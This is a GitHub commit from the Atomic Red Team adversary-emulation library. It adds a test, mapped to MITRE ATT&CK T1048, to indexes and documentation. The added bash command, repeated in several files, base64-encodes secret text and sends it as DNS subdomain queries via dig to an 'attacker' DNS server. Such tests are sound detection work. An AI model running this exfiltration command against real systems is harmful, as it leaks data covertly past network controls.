Generated docs from job=generate-docs branch=master [ci skip]

redcanaryco · Dec 3, 2024 · 0991823 · 0991823
1 parent 3675235
commit 0991823
Show file tree

Hide file tree

Showing 16 changed files with 179 additions and 4 deletions.
diff --git a/README.md b/README.md
@@ -2,7 +2,7 @@
 
 # Atomic Red Team
 
-![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1670-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
+![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1671-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
 
 Atomic Red Team™ is a library of tests mapped to the
 [MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use

diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
@@ -2079,6 +2079,7 @@ exfiltration,T1041,Exfiltration Over C2 Channel,2,Text Based Data Exfiltration u
 exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh
 exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Alternative Protocol - SSH,7c3cb337-35ae-4d06-bf03-3032ed2ec268,sh
 exfiltration,T1048,Exfiltration Over Alternative Protocol,3,DNSExfiltration (doh),c943d285-ada3-45ca-b3aa-7cd6500c6a48,powershell
+exfiltration,T1048,Exfiltration Over Alternative Protocol,4,Exfiltrate Data using DNS Queries via dig,a27916da-05f2-4316-a3ee-feec67a437be,bash
 exfiltration,T1567.003,Exfiltration Over Web Service: Exfiltration to Text Storage Sites,1,Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows),c2e8ab6e-431e-460a-a2aa-3bc6a32022e3,powershell
 exfiltration,T1567.002,Exfiltration Over Web Service: Exfiltration to Cloud Storage,1,Exfiltrate data with rclone to cloud Storage - Mega (Windows),8529ee44-279a-4a19-80bf-b846a40dda58,powershell
 exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c51-10f4-46ce-9144-e02137b2016a,sh

diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv
@@ -442,6 +442,7 @@ exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Ove
 exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,4,Exfiltrate data as text over HTTPS using wget,8bec51da-7a6d-4346-b941-51eca448c4b0,sh
 exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh
 exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Alternative Protocol - SSH,7c3cb337-35ae-4d06-bf03-3032ed2ec268,sh
+exfiltration,T1048,Exfiltration Over Alternative Protocol,4,Exfiltrate Data using DNS Queries via dig,a27916da-05f2-4316-a3ee-feec67a437be,bash
 exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c51-10f4-46ce-9144-e02137b2016a,sh
 exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,1,Exfiltration Over Alternative Protocol - HTTP,1d1abbd6-a3d3-4b2e-bef5-c59293f46eff,manual
 exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,3,Exfiltration Over Alternative Protocol - DNS,c403b5a4-b5fc-49f2-b181-d1c80d27db45,manual

diff --git a/atomics/Indexes/Indexes-CSV/macos-index.csv b/atomics/Indexes/Indexes-CSV/macos-index.csv
@@ -273,5 +273,6 @@ initial-access,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing use
 exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,2,"Exfiltrate data HTTPS using curl freebsd,linux or macos",4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01,bash
 exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh
 exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Alternative Protocol - SSH,7c3cb337-35ae-4d06-bf03-3032ed2ec268,sh
+exfiltration,T1048,Exfiltration Over Alternative Protocol,4,Exfiltrate Data using DNS Queries via dig,a27916da-05f2-4316-a3ee-feec67a437be,bash
 exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c51-10f4-46ce-9144-e02137b2016a,sh
 exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,1,Exfiltration Over Alternative Protocol - HTTP,1d1abbd6-a3d3-4b2e-bef5-c59293f46eff,manual
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
@@ -2951,6 +2951,7 @@
   - Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux]
   - Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux]
   - Atomic Test #3: DNSExfiltration (doh) [windows]
+  - Atomic Test #4: Exfiltrate Data using DNS Queries via dig [macos, linux]
 - T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1567.003 Exfiltration Over Web Service: Exfiltration to Text Storage Sites](../../T1567.003/T1567.003.md)
   - Atomic Test #1: Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows) [windows]

diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md
@@ -892,6 +892,7 @@
 - [T1048 Exfiltration Over Alternative Protocol](../../T1048/T1048.md)
   - Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux]
   - Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux]
+  - Atomic Test #4: Exfiltrate Data using DNS Queries via dig [macos, linux]
 - T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1567.003 Exfiltration Over Web Service: Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

diff --git a/atomics/Indexes/Indexes-Markdown/macos-index.md b/atomics/Indexes/Indexes-Markdown/macos-index.md
@@ -778,6 +778,7 @@
 - [T1048 Exfiltration Over Alternative Protocol](../../T1048/T1048.md)
   - Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux]
   - Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux]
+  - Atomic Test #4: Exfiltrate Data using DNS Queries via dig [macos, linux]
 - T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1567.003 Exfiltration Over Web Service: Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
@@ -121140,6 +121140,45 @@ exfiltration:
           Import-Module "#{ps_module}"
           Invoke-DNSExfiltrator -i "#{ps_module}" -d #{domain} -p #{password} -doh #{doh} -t #{time} #{encoding}
         name: powershell
+    - name: Exfiltrate Data using DNS Queries via dig
+      auto_generated_guid: a27916da-05f2-4316-a3ee-feec67a437be
+      description: "This test demonstrates how an attacker can exfiltrate sensitive
+        information by encoding it as a subdomain (using base64 encoding) and \nmaking
+        DNS queries via the dig command to a controlled DNS server.\n"
+      supported_platforms:
+      - macos
+      - linux
+      input_arguments:
+        dns_port:
+          type: integer
+          default: '53'
+          description: Attacker's DNS server port
+        attacker_dns_server:
+          type: string
+          default: 8.8.8.8
+          description: Attacker's DNS server address
+        secret_info:
+          type: string
+          default: this is a secret info
+          description: secret info that will be exfiltirated
+      dependency_executor_name: bash
+      dependencies:
+      - description: dig command
+        prereq_command: which dig
+        get_prereq_command: 'which apt && sudo apt update && sudo apt install -y bind9-dnsutils
+          || which yum && sudo yum install -y bind-utils || which dnf && sudo dnf
+          install -y bind-utils || which apk && sudo apk add bind-tools || which pkg
+          && sudo pkg update && sudo pkg install -y bind-tools || which brew && brew
+          update && brew install --quiet bind
+
+          '
+      executor:
+        command: 'dig @#{attacker_dns_server} -p #{dns_port} $(echo "#{secret_info}"
+          | base64).google.com
+
+          '
+        name: bash
+        elevation_required: false
   T1052.001:
     technique:
       x_mitre_platforms:

diff --git a/atomics/Indexes/linux-index.yaml b/atomics/Indexes/linux-index.yaml
@@ -74165,6 +74165,45 @@ exfiltration:
 
           '
         name: sh
+    - name: Exfiltrate Data using DNS Queries via dig
+      auto_generated_guid: a27916da-05f2-4316-a3ee-feec67a437be
+      description: "This test demonstrates how an attacker can exfiltrate sensitive
+        information by encoding it as a subdomain (using base64 encoding) and \nmaking
+        DNS queries via the dig command to a controlled DNS server.\n"
+      supported_platforms:
+      - macos
+      - linux
+      input_arguments:
+        dns_port:
+          type: integer
+          default: '53'
+          description: Attacker's DNS server port
+        attacker_dns_server:
+          type: string
+          default: 8.8.8.8
+          description: Attacker's DNS server address
+        secret_info:
+          type: string
+          default: this is a secret info
+          description: secret info that will be exfiltirated
+      dependency_executor_name: bash
+      dependencies:
+      - description: dig command
+        prereq_command: which dig
+        get_prereq_command: 'which apt && sudo apt update && sudo apt install -y bind9-dnsutils
+          || which yum && sudo yum install -y bind-utils || which dnf && sudo dnf
+          install -y bind-utils || which apk && sudo apk add bind-tools || which pkg
+          && sudo pkg update && sudo pkg install -y bind-tools || which brew && brew
+          update && brew install --quiet bind
+
+          '
+      executor:
+        command: 'dig @#{attacker_dns_server} -p #{dns_port} $(echo "#{secret_info}"
+          | base64).google.com
+
+          '
+        name: bash
+        elevation_required: false
   T1052.001:
     technique:
       x_mitre_platforms:

diff --git a/atomics/Indexes/macos-index.yaml b/atomics/Indexes/macos-index.yaml
@@ -68743,6 +68743,45 @@ exfiltration:
 
           '
         name: sh
+    - name: Exfiltrate Data using DNS Queries via dig
+      auto_generated_guid: a27916da-05f2-4316-a3ee-feec67a437be
+      description: "This test demonstrates how an attacker can exfiltrate sensitive
+        information by encoding it as a subdomain (using base64 encoding) and \nmaking
+        DNS queries via the dig command to a controlled DNS server.\n"
+      supported_platforms:
+      - macos
+      - linux
+      input_arguments:
+        dns_port:
+          type: integer
+          default: '53'
+          description: Attacker's DNS server port
+        attacker_dns_server:
+          type: string
+          default: 8.8.8.8
+          description: Attacker's DNS server address
+        secret_info:
+          type: string
+          default: this is a secret info
+          description: secret info that will be exfiltirated
+      dependency_executor_name: bash
+      dependencies:
+      - description: dig command
+        prereq_command: which dig
+        get_prereq_command: 'which apt && sudo apt update && sudo apt install -y bind9-dnsutils
+          || which yum && sudo yum install -y bind-utils || which dnf && sudo dnf
+          install -y bind-utils || which apk && sudo apk add bind-tools || which pkg
+          && sudo pkg update && sudo pkg install -y bind-tools || which brew && brew
+          update && brew install --quiet bind
+
+          '
+      executor:
+        command: 'dig @#{attacker_dns_server} -p #{dns_port} $(echo "#{secret_info}"
+          | base64).google.com
+
+          '
+        name: bash
+        elevation_required: false
   T1052.001:
     technique:
       x_mitre_platforms:

diff --git a/atomics/T1048/T1048.md b/atomics/T1048/T1048.md
@@ -16,6 +16,8 @@ Many IaaS and SaaS platforms (such as Microsoft Exchange, Microsoft SharePoint,
 
 - [Atomic Test #3 - DNSExfiltration (doh)](#atomic-test-3---dnsexfiltration-doh)
 
+- [Atomic Test #4 - Exfiltrate Data using DNS Queries via dig](#atomic-test-4---exfiltrate-data-using-dns-queries-via-dig)
+
 
 <br/>
 
@@ -146,4 +148,52 @@ IWR "https://raw.githubusercontent.com/Arno0x/DNSExfiltrator/8faa972408b0384416f
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #4 - Exfiltrate Data using DNS Queries via dig
+This test demonstrates how an attacker can exfiltrate sensitive information by encoding it as a subdomain (using base64 encoding) and 
+making DNS queries via the dig command to a controlled DNS server.
+
+**Supported Platforms:** macOS, Linux
+
+
+**auto_generated_guid:** a27916da-05f2-4316-a3ee-feec67a437be
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| dns_port | Attacker's DNS server port | integer | 53|
+| attacker_dns_server | Attacker's DNS server address | string | 8.8.8.8|
+| secret_info | secret info that will be exfiltirated | string | this is a secret info|
+
+
+#### Attack Commands: Run with `bash`! 
+
+
+```bash
+dig @#{attacker_dns_server} -p #{dns_port} $(echo "#{secret_info}" | base64).google.com
+```
+
+
+
+
+#### Dependencies:  Run with `bash`!
+##### Description: dig command
+##### Check Prereq Commands:
+```bash
+which dig
+```
+##### Get Prereq Commands:
+```bash
+which apt && sudo apt update && sudo apt install -y bind9-dnsutils || which yum && sudo yum install -y bind-utils || which dnf && sudo dnf install -y bind-utils || which apk && sudo apk add bind-tools || which pkg && sudo pkg update && sudo pkg install -y bind-tools || which brew && brew update && brew install --quiet bind
+```
+
+
+
+
 <br/>
diff --git a/atomics/T1048/T1048.yaml b/atomics/T1048/T1048.yaml
@@ -97,6 +97,7 @@ atomic_tests:
       Invoke-DNSExfiltrator -i "#{ps_module}" -d #{domain} -p #{password} -doh #{doh} -t #{time} #{encoding}
     name: powershell
 - name: Exfiltrate Data using DNS Queries via dig
+  auto_generated_guid: a27916da-05f2-4316-a3ee-feec67a437be
   description: |
     This test demonstrates how an attacker can exfiltrate sensitive information by encoding it as a subdomain (using base64 encoding) and 
     making DNS queries via the dig command to a controlled DNS server.

diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
@@ -1699,3 +1699,4 @@ de323a93-2f18-4bd5-ba60-d6fca6aeff76
 78bef0d4-57fb-417d-a67a-b75ae02ea3ab
 6cd715aa-20ac-4be1-a8f1-dda7bae160bd
 39fab1bc-fcb9-406f-bc2e-fe03e42ff0e4
+a27916da-05f2-4316-a3ee-feec67a437be